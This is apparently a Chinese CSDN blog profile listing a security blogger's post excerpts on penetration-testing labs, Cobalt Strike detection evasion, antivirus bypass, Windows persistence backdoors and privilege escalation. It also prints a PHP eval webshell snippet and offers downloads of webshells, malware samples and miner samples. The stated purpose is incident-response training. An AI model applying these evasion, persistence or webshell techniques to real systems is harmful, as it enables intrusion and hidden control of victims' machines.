自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(250)
  • 资源 (64)
  • 收藏
  • 关注

原创 Windows server 2008 R2 IIS搭建ASP网站教程

提示安装成功。

2023-11-12 21:14:56 2263 1

原创 python安全工具开发笔记(六)——Python爬虫BeautifulSoup模块的介绍

Python hackhttp模块的使用介绍∶发起get、post请求,发起http原始数据包hackhttp介绍补充链接:import re。

2023-09-26 11:11:17 661

原创 python安全工具开发笔记(五)——python数据库编程

Python DB API访问数据库流程。

2023-09-22 11:17:07 538

原创 python安全工具开发笔记(四)——python网络编程

客户机和服务器结构。Server 唯一的目的就是等待Client 的请求,Client 连上 Server 发送必要的数据,然后等待Server端完成请求的反馈。

2023-09-22 10:49:00 421

原创 python安全工具开发笔记(三)——python 多线程

进程是程序的一次执行。每个进程都有自己的地址空间、内存、数据栈及其它记录其运行轨迹的辅助数据。所有的线程运行在同一个进程当中,共享相同的运行环境。线程有开始顺序执行和结束三个部分。1、计算机的核心是CPU,它承担了所有的计算任务。它就像一座工厂,时刻在运行。2、假定工厂的电力有限,一次只能供给一个车间使用。也就是说,一个车间开工的时候,其他车间都必须停工。背后的含义就是,单个CPU一次只能运行—个任务。3、进程就好比工厂的车间,它代表CPU所能处理的单个任务。

2022-12-01 16:28:13 1115 1

原创 渗透测试笔记——暴力破解、定时任务与shift粘贴键权限维持、wakuang程序(靶机系统:Windows2008)

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆一、环境搭建靶机: Windwos Server 2008 系统靶机IP地址: 192.168.226.137攻击IP地址: 192.168.226.1二、模拟攻击2.1 扫描端口拿到目标IP首先使用nmap扫描,探测一下开放的端口nmap -sS 192.168.226.137发现目标系统的 3389 号端口开发2.2 暴力破解 Administrator 密码使用 hydra 工具爆破 Adminis

2022-11-17 13:26:54 907 2

原创 python安全工具开发笔记(二)——python Web编程

url = 'http://www.baidu.com' r = urllib . request . urlopen(url) #对百度发起一次请求 print(r . read())下载百度图片并且重命名为baidu.png放在D盘的根目录下注意:Python 3.x 以上的版本,请注意python 3.x 以上的版本 urllib 和urllib2 已经被集合到一个包里 urllib 中。

2022-09-21 16:16:41 1617

原创 python安全工具开发笔记(一)——python正则表达式

字符一般字符匹配自身abcabc.匹配任意换行符“\n”以外的字符。在DOALL模式中也能匹配换行符a.cabc\转义字符,是最后一个字符改变原来的意思。如果字符串中有字符 * 需要匹配,可以使用\*或者字符集[*]a\.ca\\ca.ca\c[...]字符集(字符类)。对应的位置可以是字符集中任意字符。字符集中的字符可以逐个列出,也可以给出范围,如[abc]或[a-c],第一个字符如果是^则表示取反,如[^abc]表示不是abc的其它字符。

2022-09-20 16:32:47 747

原创 Cobalt Strike 的 Beacon 使用介绍以及 Profile 文件修改Beacon内存教程

1、内存段是rwx权限2、内存中有 beacon 字符串3、内存中有 ReflectiveLoader 字符串。

2022-08-23 20:36:01 3400

原创 Cobalt Strike 的 Profile 文件解析

本文主要简单介绍Cobalt Strike 的 Profile 文件各项配置的作用各种 Profile 文件 下载地址:https://github.com/xx0hcd/Malleable-C2-Profiles1、关于参数与值:profile 文件将参数括在双引号中,而不是单引号中。例如:2、一些特殊字符不需要转义例如:3、值可以使用分号例如:4、值中的双引号需要转义例如:5、双斜杠表示单斜杠例如:6、编译后的 .http-post.client 必须小于252个字节。设置配置文件

2022-08-08 19:59:13 2162

原创 Cobalt Strike-修改默认证书、混淆流量-教程

首先,生成exe文件并上线使用whireshark抓取数据包查看一下默认配置下的Cobalt Strike,如下图所示默认情况下会间隔一段时间,请求一次 http://192.168.32.131//7VFJ文件、http://192.168.32.131//j.ad文件查看完整的http流,请求的http://192.168.32.131/7Vfj文件内容,请求http://192.168.32.131/j.ad文件内容。.........

2022-08-04 16:20:23 3635 6

原创 CobaltStrike-4.4-K8修改版安装使用教程

https://github.com/k8gege/Aggressor/releases/tag/cs下载之后,压缩包解压密码是:k8gege.org解压之后,如下图所示开启服务端开启客户端,默认端口是:4488,输入账号:administrator,密码:111,进行连接需要将解压缩之后的“cobaltstrike.store”文件删除,不然报错开启服务端开启客户端,默认端口是:4488,输入账号:root,密码:123,进行连接......

2022-07-04 22:39:05 5645 3

原创 绕过杀软(二)——免杀exe文件(360、火绒免杀)

攻击机: win7 IP: 192.168.32.134靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马输入回连端口号8888,点击start配置客户端木马的回连地址:192.168.32.134将文件保存在桌面开启360杀毒,直接报毒,不免杀1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开打开之后,将base6

2022-06-12 21:54:28 15763 8

原创 绕过杀软(一)—— PowerShell 进程隐藏与 NetCat进行联动

前提: 通过某些技术手段已 geshell攻击机: 192.168.32.1(win 10)、192.168.32.133(kali)靶机: 192.168.32.1(win10 WEB网站phpstudy 安装杀软360、电脑管家)因为上线cs、nc联动的命令或者脚本需要使用到 poweshell因为安装了360和火绒的服务器。在执行exe文件的时候杀毒软件会阻止exe运行如下图执行wxiaoge.exe文件都被360阻止执行 poweshell 命令会调用到powershell.exe文件也被

2022-06-11 22:24:10 1903 1

原创 常见php后门分析

一、第一种<?phpdefine('test', 1); #定义一个常量 test,并且值为1$test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错if(test == 1){ @eval($test);#一句话木马后门}连接方式二、第二种...

2022-05-31 19:55:36 794

原创 python利用 pandas 库处理 json 文件数据

json数据格式import jsonimport pandas as pd df = pd.read_json("./douban.json", lines=True, encoding="utf-8")#lines是按行读取的意思df.to_excel("./douban.xlsx")print("over.....")[{"ttery":"[123]","issue":"20130801-3391"},{"ttery":"[123]","issue":"20130801-3390"

2022-05-16 17:59:25 2430

原创 IDEA 2020版 创建WEB网站+Servlet——教程

一、创建java web并访问1、打开IDEA,选择菜单 文件-》New->Project2、选择java以及自己的JDK,然后点击下一步3、点击下一步4、填写项目名称,最后点击 完成二、创建Servlet并访问com.ceshi.servlet没有Servlet的解决办法...

2022-05-03 20:44:23 2194

原创 IDEA 2020版 创建第一个WEB网站——教程

第一步:创建一个普通的java项目1、打开IDEA,选择菜单 文件-》New->Project2、选择java以及自己的JDK,然后点击下一步3、点击下一步4、填写项目名称,最后点击 完成第二步:创建WEB项目1、项目名右键,点击 添加框架的支持2、勾选Web Application,然后点击 确定第三步:配置Tomcat...

2022-05-03 17:15:36 9410 5

原创 一次真实的应急响应案例(Windows2008)——暴力破解、留隐藏账户后门与shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)

一、事件背景某天客户反馈:服务器疑似被入侵,与恶意IP进行通信(恶意IP用192.168.226.131代替)。(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中)受害服务器: Centos系统、IP: 192.168.226.132、无WEB服务二、应急响应过程2.1 排查网络连接2.2 排查历史命令2.3 排查后门账户2.4 排查crontab后门2.5 排查是否有命令被替换三、应急响应溯源3.1 查看后门3.2 排查安全日志3.2 溯源总结至此,应急响

2022-04-02 16:25:21 12692

原创 渗透测试模拟实战——暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆一、环境搭建靶机: Windwos Server 2008 系统靶机IP地址: 192.168.226.137攻击IP地址: 192.168.226.1二、模拟攻击2.1 扫描端口拿到目标IP首先使用nmap扫描,探测一下开放的端口nmap -sS 192.168.226.137发现目标系统的 3389 号端口开发2.2 暴力破解 Administrator 密码使用 hydra 工具爆破 Adminis

2022-03-23 14:45:55 8097 1

原创 Windows留后门--教程(五)——shift粘贴键后门

一、shift粘贴键后门介绍Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。(辅助功能镜像劫持是一样的原理)二、shift粘贴键后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.2

2022-03-16 13:39:39 4195 1

原创 Windows留后门--教程(四)——Windows启动项后门

一、Windows启动项后门介绍Windows启动项后门也是攻击者常用的权限维持方式,大体上可以分为两种。一种是重启电脑时自启动后门程序实现权限维持;另一种是点击某应用、服务、程序时自启动后门程序实现权限维持。二、Windows启动项后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.226.128攻击机: kaliIP: 192.168.226.1312.1

2022-03-16 13:18:08 6579

原创 Windows留后门--教程(三)——Windows服务后门

一、Windows服务后门介绍在Windows系统中还有一个重要的机制,就是服务。通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门将比一般的持久化方法更为强健。二、Windows服务后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.226.128攻击机: kaliIP: 192.168.226.131

2022-03-16 10:11:37 6709

原创 Windows留后门--教程(二)——Windows计划任务后门

一、Windows计划任务后门介绍计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。二、Windows计划任务后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限环境: windows Server2012 IP: 192.168.226.1282.1 利用MSF生成一个EXE类型的后门木马2.2 创建计划任务2.3 监听返回的shell三、Win

2022-03-15 16:09:02 4455 1

原创 Windows留后门--教程(一)——Windows系统隐藏账户

一、Windows系统隐藏账户介绍系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。二、Windows系统添加隐藏账户-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限环境: windows Server2012 IP: 192.168.226.1282.1 第一种情况:攻击者控制某台机器,并执行添加用户指令n

2022-03-14 17:06:53 16536 6

原创 一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门——事件复现(含靶场环境)

一、事件背景某天客户反馈:服务器疑似被入侵,一直反弹shell到恶意IP(恶意IP用192.168.226.131代替)。(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中)受害服务器: Centos系统、IP: 192.168.184.142、无WEB服务二、应急响应过程2.1 排查异常并清除病毒2.1.1 使用命令 alias 查看是否异常别名...

2022-03-10 14:58:54 7704 4

原创 一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)

一、SSH协议介绍SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。危害:SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。一、事件背景某天客户反馈:Linux服务器有异常连接,疑似被入侵。(真实案

2022-03-01 10:48:07 7774 10

原创 渗透测试笔记——暴力破解、ssh公钥权限维持、GPU Wakuang程序(靶机系统:ubuntu)

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆

2022-02-17 16:30:50 1824 1

原创 渗透测试模拟实战——暴力破解、替换ps命令、留多个后门

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆一、环境搭建Centos8系统 IP地址: 192.168.184.142二、模拟攻击2.1 扫描端口拿到目标IP首先使用nmap扫描,探测一下开放的端口nmap -sS 192.168.226.132发现目标系统的22号端口开发2.2 暴力破解root密码使用 hydra 工具爆破 ssh 登录密码hydra.exe -l root -P pass.txt ssh://192.168.226.132#-l

2022-01-14 14:49:32 4509 3

原创 windows权限提升——烂土豆+dll劫持+引号路径&+服务权限

一、win2012—烂土豆配合令牌窃取提权—web权限1.1 RottenPotato(烂土豆)提权的原理1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个

2021-12-06 12:26:44 4262

原创 windows权限提升——windows2003进程注入提升(本地)

一、进程注入简介进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。版本: Windows2008之前1.1 提权教程演示环境:windows20031、将pinjector工具上传到目标服务器,运行以下命令pinjector.exe       //运行命令,查看用法pinjector.exe -l //列出可注入的进程pin

2021-12-03 11:28:21 4042

原创 PostgreSQL 数据库提权的几种方法——提权教程

一、漏洞描述二、漏洞原理三、环境搭建四、漏洞复现五、漏洞修复

2021-12-02 10:00:26 2889

原创 windows权限提升——windows2008&7 令牌窃取提升(本地)

一、令牌窃取提升介绍原理: 进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统。比如:Microsoft Windows XP Professional SP3和之前版本Windows Server 2003 SP2和之前的版本Windows Server 2003 x64和x64 SP2Windows Serv

2021-12-01 17:08:57 4295

原创 SqlMap——Oracle注入教程

一、漏洞复现靶场注入点: http://59.63.200.79:8808/?id=11、使用sqlmap检测是否存在注入点python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agent检测发现存在注入点,注入点在参数id的位置,数据库为Oracle数据库2、查看Oracle中全部的数据库python sqlmap.py -u "http://59.63.200.79:8808/?id=1" --random-agen

2021-12-01 11:07:10 3806

原创 windows权限提升——AT、SC、PS命令提权

一、AT命令适用范围: Windows2000、Windows 2003、Windows XP1.1 AT命令简介AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。因为AT命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。1.2 AT命令提权实验系统:windows2003命令:at 13:38

2021-11-25 14:22:46 5676 2

原创 Metabase 信息泄露漏洞(CVE-2021-41277)——漏洞复现

一、漏洞简介metabase 是一个简单、开源的数据分析平台。CVE-2021-41277在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。该漏洞CVSS评分:9.9,危害等级:严重二、影响版本影响版本:metabase version < 0.40.5metabase version >= 1.0.0, < 1

2021-11-24 10:50:50 2963

原创 应用服务器GlassFish 任意文件读取——漏洞复现

一、漏洞介绍glassfish是一款java编写的跨平台的开源的应用服务器。java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。(所以 glassfish 这个 poc 实际上就是…/…/…/…/…/…/…/…/…/…/…/etc/passwd)二、影响版本< 4.1.1三、漏洞复现1、fofa上搜索 "GlassFish" &

2021-11-24 10:32:04 2033

原创 Web Service渗透测试——介绍+实例演示

一、API 接口介绍1.1 RPC(远程过程调用)远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程序员无需额外地为这个交互作用编程。如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用,例:Java RMI。RPC 一般直接使用 TCP 协议进行通信,通常不涉及到 HTTP。HTTP 下面有2种技术: XML-RPC JSON-RPCWeb se

2021-11-23 11:14:00 1504

原创 渗透测试——常见服务端口及对应的漏洞汇总

一、web服务类tomcat--80/8080/8009 manager弱口令(漏洞利用可以上传war包getshell) put上传webshell HTTP慢速攻击 ajr文件包含漏洞-CVE-2020-1938 Jboss--8080 后台弱口令 console后台部署war包 JAVA反序列化 远程代码执行 webSphere--9080

2021-11-17 14:49:18 5302 2

原创 ActiveMQ 任意文件写入漏洞 getshell (CVE-2016-3088)——漏洞复现

一、ActiveMQ 漏洞介绍1.1、ActiveMQ 简介ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现

2021-11-11 17:00:14 4813

一次真实的应急响应案例(Windows2008)—暴力破解、留隐藏账户与shift粘贴键后门、植入WK程序-应急响应靶场

一次真实的应急响应案例(Windows2008)—暴力破解、留隐藏账户、shift粘贴键后门、植入wakuang程序——对应的应急响应靶场,应急响应教程参考链接:https://wxiaoge.blog.csdn.net/article/details/123897920?spm=1001.2014.3001.5502

2022-04-06

渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(对应靶场和wakuang样本)

渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)对应的靶场和wakuang样本,参考教程链接:https://blog.csdn.net/weixin_40412037/article/details/123685991?spm=1001.2014.3001.5501

2022-03-24

一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门对应的应急响应靶场

暴力破解、替换ps命令、留多个houmen-应急响应靶场,应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/123323981?spm=1001.2014.3001.5501

2022-03-10

一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留hou门、植入GPU WK程序——事件复现(靶场下载地址)

靶场 对应 应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/122963589?spm=1001.2014.3001.5502

2022-03-02

渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)

渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可

2022-02-18

PHP+MYSQL-图书管理系统(前端+后端全套源码)

PHP+MYSQL-图书管理系统(前端+后端全套源码),亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_59212988/article/details/119182176

2021-08-04

PHP+MYSQL—食品购物管理系统(前端+后端全套源码)

PHP+MYSQL—食品购物管理系统(前端+后端全套源码),亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_40412037/article/details/119354634

2021-08-04

PHP+Mysql—留言管理系统(前端+后端、整套源码).zip

PHP+Mysql—留言管理系统(前端+后端、整套源码),亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_59212988/article/details/118454519

2021-08-04

PHP+Mysql—博客管理系统(前端+后端)整套源码

PHP+Mysql—博客管理系统(前端+后端)整套源码,亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_59212988/article/details/118967114

2021-08-04

实战分析PHP大马隐藏后门——(案例二)的PHP大马

实战分析PHP大马隐藏后门——(案例二)的PHP大马

2021-07-07

实战分析PHP大马隐藏后门(案例一)的-PHP大马

实战分析PHP大马隐藏后门(案例一)的-PHP大马

2021-07-07

PHP+Mysql—仓储管理系统网站(前端+后端)-源码.zip

PHP+Mysql—仓储管理系统网站(前端+后端)-源码,亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_40412037/article/details/117904837

2021-06-15

PHP+Mysql—学生信息管理系统网站(前端+后端)-源码.zip

PHP—图书馆管理系统网站开发-源码(前端+后端全套),亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_40412037/article/details/117790543

2021-06-13

PHP—图书馆管理系统网站开发-源码.zip

PHP—图书馆管理系统网站开发-源码(前端+后端全套),亲测真实有效,网站详情可查看链接:https://blog.csdn.net/weixin_40412037/article/details/117880821

2021-05-13

PHP漏洞挖掘(十):PHP高级开发技术——课程资源百度网盘下载.txt

PHP漏洞挖掘(十):PHP高级开发技术——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载.txt

PHP漏洞挖掘(九):PHP网站代码审计实战——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源百度网盘下载.txt

PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(七):PHP框架开发详解——课程资源百度网盘下载.txt

PHP漏洞挖掘(七):PHP框架开发详解——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(六):PHP常见CMS的漏洞分析——课程资源百度网盘下载.txt

PHP漏洞挖掘(六):PHP常见CMS的漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(五):PHP的CMS二次开发——课程资源百度网盘下载.txt

PHP漏洞挖掘(五):PHP的CMS二次开发——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载.txt

PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载,,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(三):PHP工具开发实战——课程资源百度网盘下载.txt

PHP漏洞挖掘(三):PHP工具开发实战——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(二):PHP常见漏洞分析——课程资源百度网盘下载.txt

PHP漏洞挖掘(二):PHP常见漏洞分析——课程资源百度网盘下载,亲测真实有效!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载.txt

PHP漏洞挖掘(一):PHP基础知识讲解——课程资源百度网盘下载地址,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥

2021-05-06

应急响应实践课程(全新升级)—课程资源与下载地址.docx

应急响应实践课程(全新升级-视频教程)-课程资源与下载地址,亲测真实有效、,在知识星球中也分享了该资源,知识星球:W小哥

2021-04-22

Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt

Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。

2021-04-21

渗透测试模拟实战(含靶场环境)——暴力破解、留crontab隐藏后men-shell文件与靶场下载地址(1).txt

渗透测试模拟实战(含靶场环境)——暴力破解、留crontab隐藏后men-靶场下载地址.txt

2021-04-21

Thinkphp全网GUI EXP 2020 HackingClub 线下典藏版

Thinkphp全网GUI EXP 2020 HackingClub 线下典藏版,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可

2021-04-13

2021.4.8 护网 0day漏洞 POC 与漏洞示例

亲测真实有效,如有侵权请联系CSDN管理员删除即可

2021-04-08

(华科企业网站管理系统)hkqyglxt-含有存储型XSS漏洞的源码包.rar

hkqyglxt-含有存储型XSS漏洞的源码包,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除即可

2021-03-24

YXcms-含有任意文件删除漏洞的源码包.zip

YXcms-含有任意文件删除漏洞的源码包,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可

2021-03-17

YXcms-含有存储型XSS漏洞的源码包

YXcms-含有存储型XSS漏洞的源码包,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可

2021-03-17

YXcms-含有SQL注入漏洞的源码包.zip

YXcms-含有SQL注入漏洞的源码包,亲测可用真实有效,如有侵权,请联系CSDN管理员删除即可

2021-03-17

CwCMS_php-带有后台文件上传漏洞源码包.rar

CwCMS_php-带有后台文件上传漏洞源码包,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可

2021-03-17

phpyun-存有逻辑漏洞验证码泄露的源码包.zip

phpyun-存有逻辑漏洞验证码泄露的源码包,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可

2021-03-16

damiCMS含有支付逻辑漏洞版本的源码.zip

damiCMS含有支付逻辑漏洞版本的源码,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可

2021-03-16

Catfish(鲶鱼)cms-带有越权漏洞的源码.zip

Catfish(鲶鱼)cms-带有越权漏洞的源码,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可

2021-03-16

kdevtmpfsi样本.zip

kdevtmpfsi样本,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可

2021-03-16

update64.exe异常程序样本.zip

亲测可用,真实有效,如有侵权,请联系CSDN管理员删除即可

2021-03-11

一次真实的应急响应案例——篡改页面、sysupdate、networkservice-靶场环境下载百度链接)

真实有效,如有侵权请联系CSDN管理员删除即可

2021-03-03

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除